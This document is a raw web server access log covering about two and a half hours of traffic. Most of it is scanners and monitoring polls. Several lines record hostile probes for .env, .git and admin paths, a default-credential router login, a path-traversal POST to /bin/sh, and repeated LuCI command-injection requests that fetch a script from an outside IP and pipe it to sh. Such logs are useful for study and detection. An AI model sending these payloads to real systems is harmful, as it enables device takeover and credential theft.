149.50.103.48 - - [04/Sep/2024:05:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Sep/2024:05:20:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
13.91.180.106 - - [04/Sep/2024:05:21:48 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
13.91.180.106 - - [04/Sep/2024:05:21:55 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
13.91.180.106 - - [04/Sep/2024:05:22:58 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
13.91.180.106 - - [04/Sep/2024:05:24:40 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
13.91.180.106 - - [04/Sep/2024:05:25:52 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
13.91.180.106 - - [04/Sep/2024:05:25:54 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
151.237.4.85 - - [04/Sep/2024:05:26:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
13.91.180.106 - - [04/Sep/2024:05:27:27 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
13.91.180.106 - - [04/Sep/2024:05:27:49 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [04/Sep/2024:05:30:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.68.162 - - [04/Sep/2024:05:32:04 +0200] "GET /.git/refs/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8"
149.50.103.48 - - [04/Sep/2024:05:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.68.162 - - [04/Sep/2024:05:34:32 +0200] "GET /.git/refs/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Linux; Android 7.1.2; Nexus 6P Build/N2G48C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36"
94.156.68.162 - - [04/Sep/2024:05:34:32 +0200] "GET /.git/refs/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
149.50.103.48 - - [04/Sep/2024:05:35:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:05:37:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.68.162 - - [04/Sep/2024:05:38:40 +0200] "GET /.git/refs/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
185.191.126.213 - - [04/Sep/2024:05:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [04/Sep/2024:05:44:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [04/Sep/2024:05:45:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
80.82.77.202 - - [04/Sep/2024:05:46:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36"
45.148.10.247 - - [04/Sep/2024:05:49:46 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.224.128.47 - - [04/Sep/2024:05:51:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.156.130.8 - - [04/Sep/2024:05:52:33 +0200] "GET /cgi-bin/main.pl HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [04/Sep/2024:05:53:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.43 - - [04/Sep/2024:05:54:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [04/Sep/2024:05:55:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Sep/2024:05:55:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [04/Sep/2024:05:56:02 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
95.214.55.138 - - [04/Sep/2024:05:56:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Sep/2024:05:56:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [04/Sep/2024:05:57:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.247 - - [04/Sep/2024:05:58:38 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
137.74.239.144 - - [04/Sep/2024:06:00:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
149.50.103.48 - - [04/Sep/2024:06:01:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:06:04:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.129.46 - - [04/Sep/2024:06:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.16.39.118 - - [04/Sep/2024:06:05:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Sep/2024:06:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Sep/2024:06:08:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.148.10.247 - - [04/Sep/2024:06:09:00 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
45.148.10.247 - - [04/Sep/2024:06:10:28 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.180.140.6 - - [04/Sep/2024:06:12:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.140.5 - - [04/Sep/2024:06:12:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [04/Sep/2024:06:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:06:14:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Sep/2024:06:14:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
64.62.197.71 - - [04/Sep/2024:06:14:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
91.92.249.4 - - [04/Sep/2024:06:15:27 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 10; DL1036) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
91.92.249.4 - - [04/Sep/2024:06:16:20 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"
91.92.249.4 - - [04/Sep/2024:06:17:09 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36"
95.214.55.138 - - [04/Sep/2024:06:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [04/Sep/2024:06:20:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
162.216.150.202 - - [04/Sep/2024:06:20:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
164.92.117.229 - - [04/Sep/2024:06:21:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
149.50.103.48 - - [04/Sep/2024:06:23:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.132.250 - - [04/Sep/2024:06:25:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.16.39.118 - - [04/Sep/2024:06:25:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [04/Sep/2024:06:26:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.173 - - [04/Sep/2024:06:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:06:29:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [04/Sep/2024:06:30:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.216.150.165 - - [04/Sep/2024:06:31:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Sep/2024:06:38:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.22.60.26 - - [04/Sep/2024:06:40:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [04/Sep/2024:06:41:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:06:42:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:06:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [04/Sep/2024:06:49:27 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
45.156.129.52 - - [04/Sep/2024:06:51:13 +0200] "GET /images/logo.blu.png HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.224.128.47 - - [04/Sep/2024:06:54:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
149.50.103.48 - - [04/Sep/2024:06:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.227.47.218 - - [04/Sep/2024:06:56:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
188.166.54.234 - - [04/Sep/2024:06:57:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
188.166.54.234 - - [04/Sep/2024:06:57:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
209.38.33.11 - - [04/Sep/2024:06:58:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
185.224.128.47 - - [04/Sep/2024:06:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
149.50.103.48 - - [04/Sep/2024:07:01:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [04/Sep/2024:07:02:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [04/Sep/2024:07:06:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [04/Sep/2024:07:07:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [04/Sep/2024:07:08:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [04/Sep/2024:07:08:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.56 - - [04/Sep/2024:07:09:55 +0200] "GET /cgi-bin/main.pl HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Sep/2024:07:10:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:11:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:12:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:14:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:15:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [04/Sep/2024:07:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:16:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:17:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:18:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.52 - - [04/Sep/2024:07:19:10 +0200] "GET /images/logo.blu.png HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Sep/2024:07:19:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.84.73.221 - - [04/Sep/2024:07:20:17 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [04/Sep/2024:07:20:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:21:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [04/Sep/2024:07:22:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [04/Sep/2024:07:22:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [04/Sep/2024:07:23:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:23:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:24:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:25:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:26:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:27:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:28:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:29:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:29:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:07:29:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [04/Sep/2024:07:30:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:30:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.112 - - [04/Sep/2024:07:30:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Sep/2024:07:31:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:31:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [04/Sep/2024:07:32:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:32:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:33:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
104.248.130.34 - - [04/Sep/2024:07:34:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Sep/2024:07:34:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:34:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
175.107.1.103 - - [04/Sep/2024:07:35:09 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:35:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:36:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:37:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [04/Sep/2024:07:38:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:38:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:39:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.59 - - [04/Sep/2024:07:40:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:40:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:41:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [04/Sep/2024:07:42:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Sep/2024:07:42:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:43:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Sep/2024:07:44:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [04/Sep/2024:07:44:09 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [04/Sep/2024:07:44:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [04/Sep/2024:07:44:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:45:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:46:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:47:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:48:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:49:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [04/Sep/2024:07:50:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.59 - - [04/Sep/2024:07:50:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Sep/2024:07:50:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.52 - - [04/Sep/2024:07:50:50 +0200] "GET /images/logo.blu.png HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Sep/2024:07:51:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2024:07:52:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.204 - - [04/Sep/2024:07:52:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.204 - - [04/Sep/2024:07:52:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
